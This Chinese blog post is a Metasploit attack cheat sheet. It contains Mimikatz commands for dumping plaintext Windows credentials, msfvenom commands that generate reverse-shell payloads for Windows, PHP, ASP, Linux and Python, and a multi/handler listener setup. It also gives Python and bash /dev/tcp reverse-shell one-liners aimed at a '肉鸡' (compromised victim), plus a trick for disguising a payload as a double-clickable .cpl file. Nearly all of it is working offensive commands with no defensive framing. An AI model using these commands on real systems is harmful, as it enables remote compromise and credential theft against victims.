• msf常用命令


    获取 Windows 明文用户名密码

    git clone https://github.com/gentilkiwi/mimikatz.git

    load mimikatz

    privilege::debug

    sekurlsa::logonPasswords full

     

     

    Python shell

    python -c "import pty;pty.spawn('/bin/bash')"

     

     

    MSF Payloads

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe

    msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "x00" -a x86 --platform win -f c

     

    MSF 生成在 Linux 下反弹的 Meterpreter Shell

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell

     

    MSF 生成反弹 Shell (C Shellcode)

    msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "x00x0ax0d" -a x86 --platform win -f c

     

    MSF 生成反弹 Python Shell

    msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py

     

    MSF 生成反弹 ASP Shell

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp

     

    MSF 生成反弹 Bash Shell

    msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh

     

    MSF 生成反弹 PHP Shell

    msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php

     

    MSF 生成反弹 Win Shell

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe

     

     

    msf监听反弹

    msf > use multi/handler

    msf exploit(handler) > set PAYLOAD php/reverse_php

    msf exploit(handler) > set LHOST 你的IP

    msf exploit(handler) > set LPORT 反弹连接的端口

    msf exploit(handler) > exploit

     

    访问shell.php就会得到一个shell会话

     

     

    PYTHON 反弹 Shell

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“你的ip”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

     

     

    nc反弹shell

    肉鸡:

    # bash -i >& /dev/tcp/反弹的ip/9999 0>&1

    黑客机先监听:

    # nc -vv -l -p 9999

    得到shell会话

    [root@xxx ~]# 

     

     

     

     

    msfvenom命令行选项如下:

        Options:

            -p, --payload    payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定

            -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

            -n, --nopsled    length>        为payload预先指定一个NOP滑动长度

            -f, --format     format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

         -e, --encoder    [encoder]       指定需要使用的encoder(编码器)

            -a, --arch       architecture>  指定payload的目标架构

                --platform   platform>      指定payload的目标平台

            -s, --space      length>        设定有效攻击荷载的最大长度

            -b, --bad-chars  list>          设定规避字符集,比如: 'x00xff'

            -i, --iterations count>         指定payload的编码次数

            -c, --add-code   path>          指定一个附加的win32 shellcode文件

            -x, --template   path>          指定一个自定义的可执行文件作为模板

            -k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行

                --payload-options            列举payload的标准选项

            -o, --out   path>               保存payload

            -v, --var-name name>            指定一个自定义的变量,以确定输出格式

            --shellest                   最小化生成payload

            -h, --help                       查看帮助选项

            --help-formats               查看msf支持的输出格式列表

     

     

     

    CPL

    其实cpl文件就是dll文件

    只需要用msf生成一个dll的payload将名字改成xx.cpl 如果目标双击的话 即可成功getshell

    payload

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.9 lport=4444 -f dll -o /tmp/test.cpl 

     

     

    可执行文件后缀

    Windows支持的可直接执行文件后缀有

    exe pif com cmd scr (jar等需要安装三方软件包不在考虑中)

     

     

    迁移会话到系统进程(如果迁移失败会失去会话,需要重新建立会话。迁移成功后,即使exit主动退出该会话,再次exploit还会自动获得反弹shell。但如果目标系统重启,还是会丢失会话):

  • 相关阅读:
    http参数传递方式
    Api接口管理工具推荐
    IntelliJ IDEA 插件推荐
    spring服务器接收参数格式
    SSM框架的常用注解整理
    Java map 详解
    遍历Map集合四中方法
    bean对应mapper.xml字段
    Java简历与面试
    SQL的case when then else end语句的用法
  • 原文地址:https://www.cnblogs.com/i-honey/p/8824853.html
Copyright © 2020-2023  润新知